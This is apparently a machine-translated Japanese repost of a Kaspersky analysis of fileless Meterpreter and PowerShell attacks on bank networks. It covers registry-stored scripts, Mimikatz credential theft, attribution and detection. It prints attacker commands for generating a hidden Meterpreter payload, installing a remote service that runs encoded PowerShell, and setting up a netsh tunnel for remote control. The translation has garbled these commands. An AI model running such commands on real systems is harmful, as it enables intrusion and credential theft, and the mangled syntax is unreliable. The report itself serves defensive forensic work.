企業ネットワークに対するファイルレス・マルウェアによる攻撃

ファイルレス・マルウェア

インシデント対応中に、セキュリティ専門家のチームは、攻撃者がネットワークに残したアーチファクト(中間生成物、加工物)を理解する必要があります。アーチファクトは、ログ、メモリ、ハードドライブに保存されます。残念なことに、これらの記憶媒体の各々は、必要なデータが利用可能である場合、限られた時間枠を有します。

攻撃されたコンピュータを再起動すると、メモリの取得が役に立たなくなります。攻撃の数ヶ月後、ログは時間の経過とともに回転するので、ログの分析は賭博になります。ハードドライブには多くの必要なデータが保存されており、その活動に応じて、フォレンジックの専門家は事故発生後1年までのデータを抽出する可能性があります。そのため、攻撃者は、データ収集中の活動を隠すために、フォレンジックではない手法(または単にSDELETE)とメモリベースのマルウェアを使用しています。そのような技術の実装の良い例はDuqu2です。ハードドライブを落として悪意のあるMSIパッケージを起動すると、ファイルの名前を変更してハードドライブからパッケージを削除し、ペイロード付きのメモリにその一部を残します。そのため、メモリフォレンジックはマルウェアとその機能の分析にとって重要です。攻撃のもう一つの重要な部分は、攻撃者がネットワークにインストールしようとしているトンネルです。サイバー犯罪者(CarbanakやGCMANなど)は、PLINKを使用しています。 Duqu2はそのために特別なドライバを使用しました。インシデント対応中に、メモリベースのマルウェアやトンネリングが、WindowsのSCやNETSなどのユーティリティを使用して攻撃者によって実行されたときに、非常に興奮して感心した理由を理解できます。

説明

この脅威は元々、ドメインコントローラ(DC)の物理メモリ内のMeterpreterコードを検出した後、銀行のセキュリティチームによって発見されました。 この種の脅威に対するカスペルスキー製品の検出名は、MEM:Trojan.Win32.CometerとMEM:Trojan.Win32.Metasploitです。 この攻撃が検出された後、Kaspersky Labはフォレンジック分析に参加し、Windowsレジストリ内でのPowerShellスクリプトの使用を発見しました。 さらに、被害者のホストから攻撃者のC2にトラフィックをトンネリングするために使用されるNETSHユーティリティが発見されました。

Metasploitフレームワークは、次のようなスクリプトを生成するために使用されていました。

このスクリプトは、メモリを割り当て、WinAPIを解決し、MeterpreterユーティリティをRAMに直接ダウンロードします。この種のスクリプトは、Metasploit Msfvenomユーティリティを使用して、次のコマンドラインオプションを使用して生成することができます。

msfvenom -p windows / meterpreter / bind_hidden_​​tcp AHOST = 10.10.1.11 -f psh-cmd
スクリプトの生成が成功した後、攻撃者はSCユーティリティを使用して、ターゲットホスト上に悪意のあるサービス(前のスクリプトを実行する)をインストールします。これは、たとえば、次のコマンドを使用して行うことができます。

sc \\ target_name create ATITscUA binpath = “C:¥Windows¥system32¥cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA” start = manual
悪意のあるサービスをインストールした後の次のステップは、たとえば次のコマンドを使用して、リモートホストから感染したマシンにアクセスするようにトンネルを設定することです。

netshインターフェイスportproxy add v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0
その結果、10.10.1.11:4444から10.10.1.12:8080に転送されるすべてのネットワークトラフィックが発生します。プロキシトンネルを設定するこの手法は、攻撃者に、リモートのインターネットホストからPowerShellに感染したホストを制御する機能を提供します。

「SC」および「NETSH」ユーティリティを使用するには、ローカルホストとリモートホストの両方の管理者権限が必要です。悪意のあるPowerShellスクリプトを使用するには、権限昇格と実行ポリシーの変更も必要です。これを達成するために、攻撃者は、Mimikatzが把握した管理者特権(たとえば、バックアップ、リモートタスクスケジューラのサービスなど)を持つサービスアカウントからの資格情報を使用しました。

特徴

影響を受けるコンピュータからのメモリダンプとWindowsレジストリの分析により、MeterpreterとMimikatzの両方を復元することができました。 これらのツールは、システム管理者のパスワードの収集や、感染したホストのリモート管理に使用されていました。

攻撃者がメモリダンプから使用するPowerShellペイロードを取得するために、次のBASHコマンドを使用しました。

cat mal_powershell.ps1_4 | カット-f12 -d “” | base64 -di | カット-f8 -d \ ‘| base64 -di | zcat – | cut -f2 -d \(| cut -f2 -d \ “| less | grep \ / | base64 -di | hd
次のペイロードの結果:

犠牲者

Kaspersky Security Networkを使用して、レジストリに悪質なPowerShellスクリプトに感染した100以上の企業ネットワークを発見しました。 これらはTrojan.Multi.GenAutorunReg.cとHEUR:Trojan.Multi.Powecod.aとして検出されます。 下の表は、国あたりの感染数を示しています。

しかし、すべてが同じ攻撃者によりマルウェアに感染しているかどうかは確認できていません。

属性

影響を受けた銀行の分析では、攻撃者が.GA、.ML、.CFのccTLDに3つのレベルのドメインとドメインを使用していたことがわかりました。 このようなドメインを使用するトリックは、ドメインの有効期限が切れた後に無料でWHOISの情報が失われていることです。 攻撃者がMetasploitフレームワーク、標準のWindowsユーティリティ、およびWHOIS情報のない未知のドメインを使用したことを考えると、これは帰属をほとんど不可能にします。 同じTTPを持つ最も近いグループはGCMANとCarbanakです。

結論

このレポートに記載されているような技術は、特に銀行業界の関連するターゲットに対して、より一般的になっています。残念なことに、一般的なツールを使用すると、異なるトリックと組み合わせると、検出が非常に難しくなります。

実際、この攻撃の検出は、RAM、ネットワーク、およびレジストリでのみ可能です。このファイルレスPowerShell攻撃に関連する悪意のある行為を検出する方法の詳細については、付録I「侵害の指標」を参照してください。

駆除とクリーニングが正常に終了したら、すべてのパスワードを変更する必要があります。この攻撃は、ネットワークの正常な除外と、標準およびオープンソースのユーティリティがどのように帰属をほとんど不可能にするかのために、マルウェアサンプルがどのように必要であるかを示しています。

これらの攻撃の詳細とその目的は、2017年4月2日〜6日にセント・マールテンで開催されるSecurity Analyst Summitで発表されます。

この攻撃に関する詳細は、Kaspersky APT Intelligence Servicesのお客様にご利用いただけます。サブスクリプションの問い合わせについては、intelreports(at)kaspersky [dot] comにお問い合わせください。

参照:

Fileless attacks against enterprise networks

Be the first to comment

コメントをお寄せください

ご登録いただいたメールアドレスは公開されません。


*